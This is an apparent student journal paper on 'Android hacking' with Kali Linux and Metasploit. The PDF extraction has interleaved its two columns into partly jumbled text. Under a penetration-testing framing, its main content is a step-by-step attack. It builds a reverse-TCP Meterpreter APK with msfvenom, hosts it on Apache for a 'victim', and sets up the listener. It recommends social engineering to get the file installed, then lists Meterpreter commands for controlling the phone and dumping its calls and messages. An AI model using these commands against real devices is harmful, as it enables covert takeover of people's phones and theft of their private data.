International Journal of Scientific Research in Computer Science, Engineering and Information Technology

ISSN : 2456-3307 (www.ijsrcseit.com)

doi : https://doi.org/10.32628/CSEIT2173111
Android Hacking in Kali Linux Using Metasploit Framework
Abhishek Arote1, Umakant Mandawkar2
B.Tech Student , SOCSE, Sandip University, Nashik, Maharashtra ,India
1

2Associate Professor, SOCSE, Sandip University, Nashik, Maharashtra, India

ABSTRACT

Article Info IT Security is a major concern of the internet as almost all communication takes
Volume 7, Issue 3 place over the internet today. The purpose of penetration testing is to ensure
Page Number: 497-504 that the system and network do not have a security breach that could allow
unauthorized access to the system and network. A possible and appropriate way
Publication Issue : to prevent system and network hacking is penetration testing. The document
May-June-2021 outlines some basic concepts of penetration testing, evaluating existing tools and
exploits, and using the Metasploit framework for penetration testing and
Article History running exploits within the framework and tools.
Accepted : 01 June 2021 Keywords: Penetration Testing, Payload, Exploit, Meterpreter, Metasploit
Published : 07 June 2021 Framework.

I. INTRODUCTION reliable computer base consisting of software,

hardware and people. Using open source frameworks
In the contemporary era, people are increasingly (such as Metasploit for exploit generation) for
dependent on computer , information technology and penetration testing use more than 1,600 exploits and
security. Information on the Internet is a major 495 payloads to attack networks and computer
concern for society and the IT industry. Security systems. Penetration testing is performed by
infrastructure and software is one of IT World's simulating unauthorized access to the system using a
primary concerns. During this time, even small manual method, automated tools, or a combination of
details on the Internet are stored in the database of both methods. "Mitigating Cyber Security Attacks by
computer systems on the Internet. To ensure that the Being Aware of Vulnerabilities and Bugs" how to
information is secure and non-vulnerable and that it handle cyber security attacks by spreading awareness
complies with the assigned security regulations, about vulnerabilities and threats, Attacks
security experts have developed various high- methodology, defense strategies of vulnerabilities
performance security tools. Approaches such as [1].“Protection against penetration attacks using
Layered Design, Assurance or Proof of Correctness, Metasploit” discusses the script based attacks, using
Software Engineering Environment and Penetration Metasploit built-in module to exploit the target
Testing Penetration tests are an essential technique system, implements Metasploit attacks and analyze
for testing the Complete operational, integrated and scripts and payloads to prepare a defense

Copyright: © the author(s), publisher and licensee Technoscience Academy. This is an open-access article distributed under the 497
terms of the Creative Commons Attribution Non-Commercial License, which permits unrestricted non-commercial use,
distribution, and reproduction in any medium, provided the original work is properly cited
 Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

script[3].”Using Kali Linux Security Tools to Create hackers (both black hat and white hat) utilize it to
Laboratory Projects for Cyber security Education” gather all the information about the victim or target.
describe the installation and lists of tools provided by UPDATE AND INITIATION: Update Kali Linux and
Kali Linux 2017.3 and uses preconfigured and Initiate apache2 service to host the android
preinstalled tools for laboratory project using application on web server so victim can access it. The
VMware (virtual machine framework)[6].“Offensive state of apache may be active or inactive.
Security : Ethical Hacking Methodology on the Web” CREATING PAYLOAD AND EXPLOITATION: The
The objective is to plan methodology, generate main goal of a pen tester is to crack all kinds of
policies for security assurance and ISO 2007 attacks, security and have remote access to the server, for this
risk analysis using MSAT 4.0 tool based on ISO we use Metasploit Framework. Moreover, we create a
standard[9]. file using payload and exploit to append a virus with
the application or file.
1.1 WHAT IS PENETRATION TESTING? REPORT GENERATION: At this stage, we only
create a full report on our penetration testing process.
Penetration testing also known as ethical hacking, are
operations of a computer system, network or web III. EXPLOITATION OF VULNERABILITIES
application to find loop holes that an attacker could
exploit. Penetration testing can be appended with The exploitation phase of the penetration test is
files/application or it is performed by individuals. On performed using web server and some tools which
the target before testing, identifying potential entry are already built into the Kali Linux OS. These tools
points, attempting to get in either virtual or real, and are free and open source tools which are made
reporting results. It is the procedure of assessing the availaible by the developers of Kali Linux
security of an organization by exploiting i.e .Offensive security.
vulnerabilities in such a way that attackers can
A. Apache2 Server
exploit them, thereby preventing and documenting
The Apache HTTP Server is a free, open source web
the attack process.
server that delivers our content via the web service
over the Internet. It fully supports all operating
1.2 WHY PERFORM A PENETRATION TEST?
systems such as UNIX, Windows, Linux etc. and is
now becoming the most popular HTTP client.
If an unauthorized person used the vulnerability to
access corporate resources, corporate resources could B. Metasploit Framework
be compromised. The goal of a penetration testing is Metasploit Framework is an open source penetration
to fix vulnerabilities before they can be used. testing and development platform that provides
exploits for a wide variety of applications, operating
II. STAGES IN PENETRATION TESTING systems, and platforms. Metasploit is one of the most
widely used penetration testing tools and is built into
INFORMATION GATHERING: Information Kali Linux.
gathering means gathering different types of
information about the target. It is the first stage of
ethical hacking where penetration testers or ethical

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 498

 Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

IV. GENERATING RESULTS OF TEST and execute. Finally, check the internet protocol
address of attacking system.
The test results should contain solutions to reduce or
eliminate the weak points. This is what distinguishes Command to login into root user :-
a penetration test from a security audit. Identified $ sudo su (to login from normal user to super user to
significant vulnerabilities must be addressed first and get all permissions i.e. read ,write and execute)
a specific schedule must be established to verify that
the vulnerabilities have been addressed. The Command to check the ip address:-
department, network or system can be selected for $ ifconfig (to verify the internet protocol address of
the same penetration testing process. host machine)
The solutions implemented depend on the
vulnerabilities identified, the loss to the company if ATTACKERS IP :- 192.168.0.196 (INTERNET
the conditions that triggered the vulnerability occur, PROTOCOL ADDRESS OF KALI OS)
and the cost (and effectiveness) of the solutions
available. One solution might require a new system
A. SWITCHING TO ROOT USER :-
running a web server to pass a vulnerability test
before opening the web port in the firewall. Another To switch from Normal or Ordinary User to Super
solution might require that all email within the user or root user. Root is the real name of the
domain be sent to a central mail system and sent to administrator account. "sudo" is a command that
the local host. Systems through the central mail enables ordinary users to perform administrative
server. Enforcement of existing policies may be the tasks. The root user has user ID 0 and nominally
only condition to address certain vulnerabilities. unlimited privileges. Root can access any file, run any
In the case of desktop security, remote management program, make any system call, and change any
software may already be banned in the company, but configuration.
better work needs to be done to ensure compliance.
There will be vulnerabilities that can be fixed by
applying the latest version of the application or the
operating system patch. The results of the report
should be closely monitored. If the information falls
into the wrong hands, an unauthorized person could
exploit the current one.

V. TEST PERFORMED

INFORMATION GATHERING : Our first work is to

login into the host or attacking system. While we
started information gathering phase, firstly we gather
that what is IP of victim. Secondly, we switch into Fig 1.1 : Switching To Root User
the root user or super user from normal user to get
maximum permissions of the system i.e read, write

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 499

 Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

B. CHECK IP ADDRESS :- D. INITIATION OF APACHE SERVER

IP address is a unique identification of a devthe Apache HTTP Server, commonly known as Apache,
Internet or on a LAN. IP stands for "Internet is a free, open source, cross-platform Web server
Protocol", these are the rules that regulate the format software released under the Apache 2 license. Apache
of data that is sent over the Internet or a LAN.Four is developed and maintained by an open developer
types of IP addresses are: public, private, static, and community under the protection of Apache Software
dynamic. Public and private indicate the position in Foundation.
the network, private is used in the network, public is
outside the network, and static and dynamic are used Commands To Start Apache2 Server :
permanently.
# service apache2 status (to verify whether the
Number of bits on IP Address are : 32 service is active or inactive)

# service apache2 start (to active the service )

Fig 1.2 : IP Address Lookup

C. UPDATE KALI LINUX :-

In short, to immaculately update your Kali system,
you only need to compute the repositories and update Fig 1.4 : Apache2 Server State Active Or Inactive
with the $ sudo apt upgrade command.
E. CREATING PAYLOAD WITH MSFVENOM
The payload is an integral part of the attack that
harms the victim. Attack vectors such as viruses,
worms, and malware may contain multiple harmful
payloads.

Metasploit payloads are divided into three types:

Single: A single file is very small and aims to establish

a certain connection, and then enter the next level.

Staged: This is the payload that an attacker can use to

Fig 1.3 : Upgradation of Kali Linux
upload larger files to the victim's system.

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 500

 Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

Stages: A stages is a payload component loaded using

the stager module. The payload stages provides
advanced features with no size limitation, such as
meterpreter and VNC injection.

Commands to create payload :

# msfvenom -p android/meterpreter/reverse_tcp
LHOST=attacker’s IP LPORT=4444
R > /var/www/html/malicious.apk

(This command will create a malicious file which you

Fig 1.6 : Starting Metasploit Framework Using
will host on apache server in /var/www/html
msfconsole
So the victim can access it)

G. EXPLOITATION
While exploitation, We need to use
exploit/multi/handler to handle the msf process.
Then we have to set the PAYLOAD which is
android/meterpreter/reverse_tcp as we have to gain
access of android and reverse tcp because the tcp port
is open on internet. Just set the LHOST and LPORT
just to exploit the apk on the host machine . Lastly,
Fig 1.5 : Activating Apache2 Server & Creating Exploit payload.
Payload
COMMANDS TO EXPLOIT :-

F. START METASPLOIT FRAMEWORK

msf6 > use exploit/multi/handler
Metasploit is one amongst the foremost powerful and msf6exploit(multi/handler)>set payload
widely utilized tools for penetration testing. The android/meterpreter/reverse_tcp
Metasploit Project could be a pc security project that msf6 exploit(multi/handler) > show options
has data regarding security vulnerabilities and aids in msf6 exploit(multi/handler) > set LHOST attackers IP
penetration testing and IDS signature msf6 exploit(multi/handler) > exploit
development.The Metasploit Framework can lead us
to take advantage of the payload that is generated.

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 501

 Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

Fig 1.8 : Gained Access Of Victims’s

Fig 1.7 : Using Exploits, Setting Payload And LHOST,
Device(Meterpreter Session Opened)
Exploitation

H. GAINED ACCESS : (Meterpreter Session Opened)

We have to use any social engineering attack to urge
the access of the android device. Social engineering
attacks are usually a kind of psychological
manipulation that trick unsuspecting users or
workers into revealing confidential or sensitive
information. In general, social engineering involves
email or alternative communications that make
urgency, fear, or similar emotions within the victim
Fig 1.9 : Apps Installed On Vicitm’s Android Device
that end in the victim being fast to disclose
confidential information, click on a malicious link, or
open a malicious file.As a result of social engineering VI. RESULT
encompasses a human component, it will be tough 1. The Metasploit platform is used to break into
for firms to forestall these attacks. Android devices using tools developed by Offensive
Security like MSF. These tools can help students and
COMMAND TO INTERNACT WITH SESSIONS : professionals learn new things.
2. Often we as penetration testers successfully gain
msf6 exploit(multi/handler) > sessions –i 1 access to a system through an exploit and
(Interaction with session 1 which is opened) meterpreters.
meterpreter > help (to know all the commands)
meterpreter > app_list (command to see the apps
VII. CONCLUSION
installed on android device)
meterpreter > app_uninstall (command to uninstall
the app) Penetration testing is a comprehensive method of
identifying vulnerabilities in a system. It offers
Attacker Can Access Camera , Dump Call Logs , benefits such as avoiding financial loss, compliance
Access File Manager , Dump Messages .Attacker Can with industry regulators, customers and shareholders,
Do Anything Whatever He Wants preserve the corporate image, proactive elimination
of Identified Risks. Testers can choose between black

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 502

 Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

box, white box and gray box tests, depending on the [7]. M. C. Tran and Y. Nakamura, “Classification of
amount of information available to the user. Testers HTTP automated software communication
can also choose between internal and external tests, behaviour using NoSql database,” in 2016
depending on the Specific Objectives. There are three International Conference on Electronics,
types of penetration testing: network, application, Information, and Communications (ICEIC),
and social engineering. This document gives the brief Danang, Vietnam, pp. 1–4, 2016.
idea about Android Hacking and step by step process [8]. A. Chowdhury, “Recent Cyber Security Attacks
to gain access of an Android Device. and
[9]. Their Mitigation Approaches – An Overview,”
in Applications and Techniques in Information
VIII. REFERENCES Security,vol. 651, L. Batten and G. Li, Eds.
Singapore: Springer Singapore, pp. 54–65, 2016.
[1]. O. Aslan and R. Samet, "Mitigating Cyber [10]. F. Cuzme-Rodríguez, M. León-Gudiño, L.
Security Attacks by Being Aware of SuárezZambrano, and M. Domínguez-Limaico,
Vulnerabilities and Bugs," 2017 International “Offensive Security: Ethical Hacking
Conference on Cyberworlds (CW), Chester, Methodology on the Web,” in Information and
pp.222-225, 2017. Communication Technologies of Ecuador
[2]. Internet Crime Complaint Centre link: (TIC.EC), vol. 884, M. Botto-Tobar, L.
www.ic3.gov BarbaMaggi, J. González-Huerta, P. Villacrés-
[3]. H. Gupta and R. Kumar, “Protection against Cevallos, O. S. Gómez, and M. I. Uvidia-
penetration attacks using Metasploit,” in 2015 Fassler, Eds. Cham: Springer International
4th International Conference on Reliability, Publishing, pp. 127–140, 2019.
Infocom Technologies and Optimization [11]. F. Holik, J. Horalek, O. Marik, S. Neradova and
(ICRITO) (Trends and Future Directions), S. Zitta,"Effective penetration testing with
Noida, India, pp. 1–4, 2015. Metasploit framework and methodologies,"
[4]. Muniz, J. & Lakhani, A. (2013). Web 2014 IEEE 15th International Symposium on
Penetration Testing with Kali Linux a practical Computational Intelligence and Informatics
guide to implementing penetration testing (CINTI), Budapest, pp. 237-242, 2014.
strategies on websites, web applications, and [12]. M. Denis, C. Zena and T. Hayajneh,
standard web protocols with Kali Linux. "Penetration testing: Concepts, attack methods,
Birmingham: Packt Publishing. and defense strategies," 2016 IEEE Long Island
[5]. Singh, A. (2012). Metasploit penetration testing Systems, Applications and Technology
cookbook over 70 recipes to master the most Conference (LISAT), Farmingdale, NY,pp. 1-6,
widely used penetration testing framework. 2016.
Birmingham: Packt Pub. [13]. S. Nagpure and S. Kurkure, “Vulnerability
[6]. A. Ghafarian, “Using Kali Linux Security Tools Assessment and Penetration Testing of Web
to Create Laboratory Projects for Cybersecurity Application,” in 2017 International Conference
Education,” in Proceedings of the Future on Computing, Communication, Control and
Technologies Conference (FTC) 2018, vol. 881, Automation (ICCUBEA), PUNE, India, pp. 1–6,
Cham: Springer International Publishing, pp. 2017.
358–367, 2019.

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 503

 Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

[14]. L. Qiang, Y. Zeming, L. Baoxu, J. Zhengwei,

and Y.Jian, “Framework of Cyber Attack
Attribution Based on Threat Intelligence,” in
Interoperability, Safety and Security in IoT,
vol. 190, N. Mitton, H. Chaouchi, T. Noel,T.
Watteyne, A. Gabillon, and P. Capolsini, Eds.
Cham:Springer International Publishing, pp.
92–103, 2017.
[15]. Y. Wang and J. Yang, “Ethical Hacking and
Network Defense: Choose Your Best Network
Vulnerability Scanning Tool,” in 2017 31st
International Conference on Advanced
Information Networking and Applications
Workshops (WAINA), Taipei, Taiwan, pp.
110–113, 2017.
[16]. Y. Kim, I. Kim, and N. Park, “Analysis of Cyber
Attacks and Security Intelligence,” in Mobile,
Ubiquitous, and Intelligent Computing, vol.
274, J. J. Park, H. Adeli, N.Park, and I.
Woungang, Eds. Berlin, Heidelberg: Springer
Berlin Heidelberg, pp. 489–494,2014.

Cite this article as :

Abhishek Arote, Umakant Mandawkar, "Android

Hacking in Kali Linux Using Metasploit Framework",
International Journal of Scientific Research in
Computer Science, Engineering and Information
Technology (IJSRCSEIT), ISSN : 2456-3307, Volume
7 Issue 3, pp. 497-504, May-June 2021. Available at
doi : https://doi.org/10.32628/CSEIT2173111
Journal URL : https://ijsrcseit.com/CSEIT2173111

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 504